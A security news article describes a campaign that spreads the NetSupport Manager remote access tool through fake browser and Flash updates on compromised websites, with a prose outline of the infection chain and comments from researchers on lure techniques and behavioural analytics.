Security researchers have identified a malicious campaign in which cyber-criminals used compromised websites to distribute malware under the guise of updates to popular applications, including Adobe Flash, Chrome and FireFox. In several cases, the legitimate remote access tool (RAT) of NetSupport Manager was distributed through updates.
NetSupport Manager is a legitimate, commercially available tool used by administrators to remotely access users' computers. But hackers have taken advantage of this tool by installing it on victim's computers.
This function collects various system information, such as architecture, computer name, user name, processor, OS, domain, manufacturer, model, BIOS version, security solutions, MAC address, keyboard, display controller configuration, and process list. In response, the server sends a function called step3 and a file called Update.js, which in turn loads and executes the final malicious payload.
The malware also uses PowerShell commands to download files from the server, including a standalone 7zip executable file that contains a remote access tool, and a batch script for installing the NetSupport client on the system.
The script can also disable Windows error reporting and application compatibility, adding the executable file to the list of allowed programs, downloading the shortcut to the Startup folder, hiding specific files, deleting artifacts, etc.
By using NetSupport Manager, attackers can gain remote access to hacked systems, launch applications, receive location data, and steal system information.
“RATs are widely used for legitimate purposes, often by system administrators. However, since they are legitimate applications and readily available, malware authors can easily abuse them and sometimes can avoid user suspicion as well,” said Sudhanshu Dubey, a security researcher at Fireeye.
Luke Somerville, head of special investigations at Forcepoint, told SC Media UK that the use of ‘fake updates' is something we have been seeing for some time.
“We recently spoke about the UDPoS malware, a family which is consistently disguised as a software update to important system and administration software. Overall, the technique is probably about halfway up the clever spectrum: it's been around for quite some time and it couldn't be described as particularly innovative in modern times, but end-users are very used to seeing and accepting prompts for software updates to the point where many experience ‘update request fatigue'. Malicious actors don't need to innovate or change lure techniques when their existing tricks continue to be effective,” he said.
Barry Shteiman, director of Threat Research at Exabeam, told SC Media UK that organisations need to be able to detect unusual activity from valid machines and users, which is why behavioural analytics has grown so quickly over the last couple of years.
“While standard security technology focuses on “can you access this data?” behavioural analytics focuses on “should you be accessing this data?” – this is much more useful for detecting threats such as RATs, which can compromise entire corporate machines. Behavioural analytics is also the only way to get real insight into the insider threat. It can tell an organisation when someone is doing something that is unusual and risky, on an individual basis and compared to peers,” he said.